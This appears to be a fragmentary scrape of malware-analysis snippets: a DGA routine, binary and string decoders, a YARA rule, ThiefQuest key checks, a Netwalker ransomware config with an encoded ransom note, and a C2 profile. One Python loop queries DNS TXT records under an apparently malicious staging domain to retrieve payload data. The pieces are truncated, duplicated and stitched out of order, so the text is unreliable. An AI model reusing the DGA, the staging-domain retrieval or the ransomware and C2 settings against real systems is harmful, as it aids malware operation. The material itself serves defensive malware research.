DGA code:
import java.util.Calendar;
import java.util.Random;
public class myTest {
private static long seed;
private static final int MAX_HOSTS = 2000;
private static void GetSeed(int m) {
int i = Calendar.getInstance().get(1);
import sys | |
import struct | |
# Byte pattern that find_pclntab() below searches for in the binary image.
# Presumably the Go pclntab header magic in little-endian byte order —
# confirm against the Go runtime version of the sample being analysed.
magic = '\xfa\xff\xff\xff' '\x00\x00'

# Endianness tag and pointer width (in bytes) assumed for the target binary.
ver = 'le'
psize = 8
def find_pclntab(data): | |
off = data.find(magic) |
import dns.resolver | |
# Fixed suffix of the lookup hostname; the loop below (its body is cut off
# here) prepends three single-character labels to it before each TXT query.
c = '.stage.1950252.updates.updaternetworkmanagerr.com'

# The three label counters all start at 'a' (0x61) and are advanced by the
# loop; kept as separate names because the query line refers to each one.
v = vv = vvv = ord('a')

# Loop control flag and the buffer the retrieved records are gathered into
# (presumably; the accumulation logic is outside this excerpt).
done = False
out = ""
while not done: | |
t = dns.resolver.query(chr(v)+chr(vv)+chr(vvv)+c, 'TXT') |
DGA code:
import java.util.Calendar;
import java.util.Random;
public class myTest {
private static long seed;
private static final int MAX_HOSTS = 2000;
private static void GetSeed(int m) {
int i = Calendar.getInstance().get(1);
import sys | |
import pefile | |
import struct | |
def decode(data): | |
out = "" | |
for i in range(len(data)/2): | |
t1 = data[i*2] | |
t2 = data[(i*2)+1] | |
t1 &= 0xf0 |
def decode_data(data, key, sz): | |
S = list(range(sz)) | |
S = [x&0xff for x in S] | |
j = 0 | |
out = [] | |
for i in range(sz): | |
j = (j + S[i] + ord( key[i % len(key)] )) % sz | |
S[i] , S[j] = S[j] , S[i] | |
i = j = 0 | |
for char in data: |
import yara | |
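# YARA rule selecting the encoded URL blobs that decoder() below extracts.
# Raw string literal so that the `\d` inside the regex is passed to YARA
# verbatim instead of being parsed as a (invalid) Python string escape,
# which newer Python versions flag with a SyntaxWarning. The rule text is
# byte-identical to the non-raw form.
rules = yara.compile(source=r'rule urls { strings: $a1 = /[0-9a-zA-Z_|]{6,}00000\d+/ ascii wide condition: all of them }')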
def decoder(data): | |
matches = rules.match(data=data) | |
if matches != []: | |
matches = matches[0].strings |
Checking the expanded keys shows no difference.
t2 uses ThiefQuest's generate_xkey
>>> t2 | |
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B') | |
t uses a standard key expansion for RC2
>>> t | |
bytearray(b'\xcav33JX2tdnsedvwwraH6pryV0sd2mxC5uSlhUQCxGxGmxE3ThvKBO1wSh58X4K7CHs0c35btQk1Pr2jaxxfqmD0uISsMH1rowcrluv93hwdD1RgC6MT4q7y34VTL1l4B') | |
{ | |
"lfile": "{id}-Readme.txt", | |
"spsz": 15360, | |
"lend": "SGkhDQpZb3VyIGZpbGVzIGFyZSBlbmNyeXB0ZWQgYnkgTmV0d2Fsa2VyLg0KQWxsIGVuY3J5cHRlZCBmaWxlcyBmb3IgdGhpcyBjb21wdXRlciBoYXMgZXh0ZW5zaW9uOiAue2lkfQ0KDQotLQ0KSWYgZm9yIHNvbWUgcmVhc29uIHlvdSByZWFkIHRoaXMgdGV4dCBiZWZvcmUgdGhlIGVuY3J5cHRpb24gZW5kZWQsDQp0aGlzIGNhbiBiZSB1bmRlcnN0b29kIGJ5IHRoZSBmYWN0IHRoYXQgdGhlIGNvbXB1dGVyIHNsb3dzIGRvd24sDQphbmQgeW91ciBoZWFydCByYXRlIGhhcyBpbmNyZWFzZWQgZHVlIHRvIHRoZSBhYmlsaXR5IHRvIHR1cm4gaXQgb2ZmLA0KdGhlbiB3ZSByZWNvbW1lbmQgdGhhdCB5b3UgbW92ZSBhd2F5IGZyb20gdGhlIGNvbXB1dGVyIGFuZCBhY2NlcHQgdGhhdCB5b3UgaGF2ZSBiZWVuIGNvbXByb21pc2VkLg0KUmVib290aW5nL3NodXRkb3duIHdpbGwgY2F1c2UgeW91IHRvIGxvc2UgZmlsZXMgd2l0aG91dCB0aGUgcG9zc2liaWxpdHkgb2YgcmVjb3ZlcnkuDQoNCi0tDQpPdXIgIGVuY3J5cHRpb24gYWxnb3JpdGhtcyBhcmUgdmVyeSBzdHJvbmcgYW5kIHlvdXIgZmlsZXMgYXJlIHZlcnkgd2VsbCBwcm90ZWN0ZWQsDQp0aGUgb25seSB3YXkgdG8gZ2V0IHlvdXIgZmlsZXMgYmFjayBpcyB0byBjb29wZXJhdGUgd2l0aCB1cyBhbmQgZ2V0IHRoZSBkZWNyeXB0ZXIgcHJvZ3JhbS4NCg0KRG8gbm90IHRyeSB0byByZWNvdmVyIHlvdXIgZmlsZXMgd2l0aG |
Pivot from config at https://twitter.com/VK_Intel/status/1260296104672886790
{ | |
C2_CHUNK_POST: 0 | |
C2_POSTREQ: [('_HEADER', 0, 'Content-Type: application/octet-stream'), ('BUILD', ('PARAMETER', 'id'))] | |
C2_RECOVER: | |
C2_REQUEST: [('BUILD', ('BASE64', 'HEADER', 'Cookie'))] | |
C2_VERB_GET: GET | |
C2_VERB_POST: POST | |
CRYPTO_sCHEME: 1 |